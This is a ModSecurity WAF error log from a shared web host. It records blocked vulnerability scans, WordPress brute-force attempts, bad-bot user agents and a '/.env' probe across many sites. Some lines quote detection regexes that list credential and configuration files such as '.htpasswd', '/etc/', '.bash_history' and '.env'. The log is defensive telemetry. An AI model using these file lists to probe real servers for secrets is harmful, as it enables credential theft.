[Tue May 26 17:48:08.153703 2026] [security2:error] [pid 924957:tid 925132] [client 4.228.83.111:38043] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/gecko.php"] [unique_id "ahWPgOYv2AvxeXULfJd0jQAAAC0"]
[Tue May 26 17:48:09.721995 2026] [security2:error] [pid 924957:tid 925120] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPgeYv2AvxeXULfJd0qAAAACE"]
[Tue May 26 17:48:09.914230 2026] [security2:error] [pid 924957:tid 925121] [client 4.228.83.111:45160] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cliffengg.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWPgeYv2AvxeXULfJd0wQAAACI"]
[Tue May 26 17:48:10.092256 2026] [security2:error] [pid 924957:tid 925133] [client 4.228.83.111:45160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-content/upgrade/index.php"] [unique_id "ahWPguYv2AvxeXULfJd0yQAAAC4"]
[Tue May 26 17:48:10.092358 2026] [security2:error] [pid 924957:tid 925133] [client 4.228.83.111:45160] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/wp-content/upgrade/index.php"] [unique_id "ahWPguYv2AvxeXULfJd0yQAAAC4"]
[Tue May 26 17:48:11.276222 2026] [security2:error] [pid 924957:tid 925121] [client 4.228.83.111:42916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/cah.php"] [unique_id "ahWPg-Yv2AvxeXULfJd09AAAACI"]
[Tue May 26 17:48:11.276343 2026] [security2:error] [pid 924957:tid 925121] [client 4.228.83.111:42916] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/cah.php"] [unique_id "ahWPg-Yv2AvxeXULfJd09AAAACI"]
[Tue May 26 17:48:12.163711 2026] [security2:error] [pid 924957:tid 925209] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPg-Yv2AvxeXULfJd1AgAAAHo"]
[Tue May 26 17:48:12.413087 2026] [security2:error] [pid 924957:tid 925169] [client 4.228.83.111:45145] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cliffengg.svijaykumar.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWPhOYv2AvxeXULfJd1EAAAAFI"]
[Tue May 26 17:48:13.042695 2026] [security2:error] [pid 924957:tid 925106] [client 4.228.83.111:45145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cliffengg.svijaykumar.in"] [uri "/system_log.php"] [unique_id "ahWPheYv2AvxeXULfJd1JQAAABM"]
[Tue May 26 17:48:13.042793 2026] [security2:error] [pid 924957:tid 925106] [client 4.228.83.111:45145] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cliffengg.svijaykumar.in"] [uri "/system_log.php"] [unique_id "ahWPheYv2AvxeXULfJd1JQAAABM"]
[Tue May 26 17:48:14.487886 2026] [security2:error] [pid 924957:tid 925208] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPhuYv2AvxeXULfJd1RQAAAHk"]
[Tue May 26 17:48:15.284417 2026] [http2:info] [pid 937900:tid 937900] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:48:16.975055 2026] [security2:error] [pid 937900:tid 938090] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPiE4hPNS8CpkGLta-sQAAAME"]
[Tue May 26 17:48:18.069584 2026] [security2:error] [pid 937900:tid 938157] [client 14.165.62.162:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPiU4hPNS8CpkGLta-zwAAAQQ"]
[Tue May 26 17:48:19.129517 2026] [security2:error] [pid 937900:tid 938079] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPik4hPNS8CpkGLta-7QAAALY"]
[Tue May 26 17:48:21.531089 2026] [security2:error] [pid 937900:tid 938047] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPjU4hPNS8CpkGLta_JAAAAJY"]
[Tue May 26 17:48:26.278858 2026] [security2:error] [pid 937900:tid 938044] [client 62.60.130.228:59661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWPkk4hPNS8CpkGLta_swAAAJM"], referer: https://duckduckgo.com/
[Tue May 26 17:48:26.527690 2026] [security2:error] [pid 937900:tid 938122] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPkk4hPNS8CpkGLta_sgAAAOE"]
[Tue May 26 17:48:26.611077 2026] [security2:error] [pid 937900:tid 938101] [client 62.60.130.228:64318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWPkk4hPNS8CpkGLta_wAAAAMw"]
[Tue May 26 17:48:26.614457 2026] [security2:error] [pid 937900:tid 938052] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPkk4hPNS8CpkGLta_tgAAAJs"]
[Tue May 26 17:48:27.794675 2026] [security2:error] [pid 937900:tid 938120] [client 62.60.130.228:61235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWPk04hPNS8CpkGLta_2wAAAN8"], referer: https://t.co/
[Tue May 26 17:48:28.302842 2026] [security2:error] [pid 937900:tid 938031] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPk04hPNS8CpkGLta_5wAAAIY"]
[Tue May 26 17:48:31.029778 2026] [security2:error] [pid 937900:tid 938044] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPlk4hPNS8CpkGLtbALgAAAJM"]
[Tue May 26 17:48:31.964094 2026] [security2:error] [pid 937900:tid 938092] [client 114.119.144.7:30049] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/project/full-motos/"] [unique_id "ahWPl04hPNS8CpkGLtbAYAAAAMM"], referer: https://www.jhonweb.com/project_category/web-corporativa
[Tue May 26 17:48:33.452705 2026] [security2:error] [pid 937900:tid 938087] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPmU4hPNS8CpkGLtbAewAAAL4"]
[Tue May 26 17:48:34.903439 2026] [security2:error] [pid 937900:tid 938066] [client 176.65.139.232:59898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "abilitypneumaticsystems.com"] [uri "/.env"] [unique_id "ahWPmk4hPNS8CpkGLtbAuQAAAKk"]
[Tue May 26 17:48:35.547276 2026] [security2:error] [pid 937900:tid 938087] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPm04hPNS8CpkGLtbAwwAAAL4"]
[Tue May 26 17:48:35.550305 2026] [security2:error] [pid 937900:tid 938138] [client 66.249.66.197:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWPm04hPNS8CpkGLtbA0AAAAPE"]
[Tue May 26 17:48:37.804913 2026] [security2:error] [pid 937900:tid 938144] [client 185.191.171.4:13402] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/5/"] [unique_id "ahWPnU4hPNS8CpkGLtbBDgAAAPc"]
[Tue May 26 17:48:37.805088 2026] [security2:error] [pid 937900:tid 938144] [client 185.191.171.4:13402] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/5/"] [unique_id "ahWPnU4hPNS8CpkGLtbBDgAAAPc"]
[Tue May 26 17:48:37.992976 2026] [security2:error] [pid 937900:tid 938040] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPnU4hPNS8CpkGLtbBBwAAAI8"]
[Tue May 26 17:48:38.465808 2026] [security2:error] [pid 937900:tid 938041] [client 47.128.46.90:15502] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/programs-and-campaigns/cross-cutting-programs"] [unique_id "ahWPnk4hPNS8CpkGLtbBIQAAAJA"]
[Tue May 26 17:48:40.356472 2026] [security2:error] [pid 937900:tid 938081] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPn04hPNS8CpkGLtbBUQAAALg"]
[Tue May 26 17:48:41.410408 2026] [security2:error] [pid 937900:tid 938114] [client 74.7.228.47:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.digentasmartsn.com"] [uri "/index.php"] [unique_id "ahWPn04hPNS8CpkGLtbBPQAAANk"]
[Tue May 26 17:48:41.410434 2026] [security2:error] [pid 937900:tid 938114] [client 74.7.228.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.digentasmartsn.com"] [uri "/index.php"] [unique_id "ahWPn04hPNS8CpkGLtbBPQAAANk"]
[Tue May 26 17:48:41.411240 2026] [security2:error] [pid 937900:tid 938101] [client 74.7.228.47:34642] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.digentasmartsn.com"] [uri "/robots.txt"] [unique_id "ahWPn04hPNS8CpkGLtbBOwAAzFY"]
[Tue May 26 17:48:41.879229 2026] [security2:error] [pid 937900:tid 938157] [client 74.7.228.47:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "digentasmartsn.com"] [uri "/index.php"] [unique_id "ahWPoU4hPNS8CpkGLtbBhwAAAQQ"], referer: https://www.digentasmartsn.com/robots.txt
[Tue May 26 17:48:41.880074 2026] [security2:error] [pid 937900:tid 938061] [client 74.7.228.47:34652] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "digentasmartsn.com"] [uri "/robots.txt"] [unique_id "ahWPoU4hPNS8CpkGLtbBhQAApGg"], referer: https://www.digentasmartsn.com/robots.txt
[Tue May 26 17:48:42.897890 2026] [security2:error] [pid 937900:tid 938143] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPok4hPNS8CpkGLtbBnwAAAPY"]
[Tue May 26 17:48:45.138239 2026] [security2:error] [pid 937900:tid 938131] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPpE4hPNS8CpkGLtbB2AAAAOo"]
[Tue May 26 17:48:47.217618 2026] [security2:error] [pid 937900:tid 938050] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPpk4hPNS8CpkGLtbCGwAAAJk"]
[Tue May 26 17:48:48.221473 2026] [security2:error] [pid 937900:tid 938046] [client 14.191.233.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPp04hPNS8CpkGLtbCNQAAAJU"]
[Tue May 26 17:48:48.986721 2026] [security2:error] [pid 937900:tid 937962] [remote 45.79.189.31:42916] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWPqE4hPNS8CpkGLtbCVgAAtz0"]
[Tue May 26 17:48:49.530729 2026] [security2:error] [pid 937900:tid 938065] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPqU4hPNS8CpkGLtbCXgAAAKg"]
[Tue May 26 17:48:52.307801 2026] [security2:error] [pid 937900:tid 938047] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPq04hPNS8CpkGLtbCnwAAAJY"]
[Tue May 26 17:48:54.535300 2026] [security2:error] [pid 937900:tid 938106] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPrk4hPNS8CpkGLtbC4QAAANE"]
[Tue May 26 17:48:54.868429 2026] [security2:error] [pid 937900:tid 938113] [client 57.141.2.64:21993] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jhonweb.com"] [uri "/index.php"] [unique_id "ahWPrk4hPNS8CpkGLtbC8AAA2Ds"]
[Tue May 26 17:48:56.602173 2026] [security2:error] [pid 937900:tid 938147] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPsE4hPNS8CpkGLtbDFgAAAPo"]
[Tue May 26 17:48:58.451311 2026] [security2:error] [pid 937900:tid 938063] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPsk4hPNS8CpkGLtbDQAAAAKY"]
[Tue May 26 17:49:01.549370 2026] [security2:error] [pid 937900:tid 938133] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPtU4hPNS8CpkGLtbDigAAAOw"]
[Tue May 26 17:49:01.680538 2026] [security2:error] [pid 937900:tid 938138] [client 37.27.51.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWPtE4hPNS8CpkGLtbDfAAAAPE"]
[Tue May 26 17:49:02.564471 2026] [security2:error] [pid 937900:tid 938074] [client 114.119.152.231:48379] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "preetishah.com"] [uri "/episodes/trapped-in-irrational-fear-the-struggle-series/"] [unique_id "ahWPtk4hPNS8CpkGLtbDrAAAALE"], referer: https://preetishah.com/episodes/trapped-in-irrational-fear-the-struggle-series/
[Tue May 26 17:49:02.886882 2026] [security2:error] [pid 937900:tid 938126] [client 45.92.229.234:54425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.229.92.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thegoodsporting.com"] [uri "/wp-login.php"] [unique_id "ahWPtk4hPNS8CpkGLtbDrQAAAOU"]
[Tue May 26 17:49:03.728557 2026] [security2:error] [pid 937900:tid 938057] [client 45.130.83.161:38529] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 161.83.130.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thegoodsporting.com"] [uri "/administrator/"] [unique_id "ahWPt04hPNS8CpkGLtbDxgAAAKA"]
[Tue May 26 17:49:03.767206 2026] [security2:error] [pid 937900:tid 938042] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPt04hPNS8CpkGLtbDxQAAAJE"]
[Tue May 26 17:49:05.571439 2026] [security2:error] [pid 937900:tid 938045] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPuU4hPNS8CpkGLtbD-gAAAJQ"]
[Tue May 26 17:49:08.423343 2026] [security2:error] [pid 937900:tid 938039] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPvE4hPNS8CpkGLtbEfQAAAI4"]
[Tue May 26 17:49:09.319284 2026] [security2:error] [pid 937900:tid 938033] [client 107.189.16.223:51946] ModSecurity: Access denied with code 406 (phase 1). Pattern match "python-requests|python-urllib" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "1460"] [id "909111"] [msg "Python UA brute"] [hostname "panda-eco.com"] [uri "/Search-Replace-DB-master/"] [unique_id "ahWPvU4hPNS8CpkGLtbEmQAAAIg"]
[Tue May 26 17:49:10.094905 2026] [security2:error] [pid 937900:tid 938151] [client 3.79.134.69:62640] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWPvU4hPNS8CpkGLtbEoAAAAP4"], referer: https://thegoodsporting.com
[Tue May 26 17:49:10.774841 2026] [security2:error] [pid 937900:tid 938111] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPvk4hPNS8CpkGLtbEtgAAANY"]
[Tue May 26 17:49:13.048842 2026] [security2:error] [pid 937900:tid 938080] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPwE4hPNS8CpkGLtbE6wAAALc"]
[Tue May 26 17:49:14.319487 2026] [security2:error] [pid 937900:tid 938103] [client 91.117.177.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWPwU4hPNS8CpkGLtbE_QAAAM4"], referer: https://www.anujtradingco.com/
[Tue May 26 17:49:15.181734 2026] [security2:error] [pid 937900:tid 938098] [client 91.117.177.142:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWPw04hPNS8CpkGLtbFMAAAAMk"], referer: https://www.anujtradingco.com/blog-2/blog-boxed-bigtext/?unapproved=1186526&moderation-hash=dd6fb4b9da4a13d304b4106fad919de7
[Tue May 26 17:49:15.871972 2026] [security2:error] [pid 937900:tid 938032] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWPw04hPNS8CpkGLtbFPwAAAIc"]
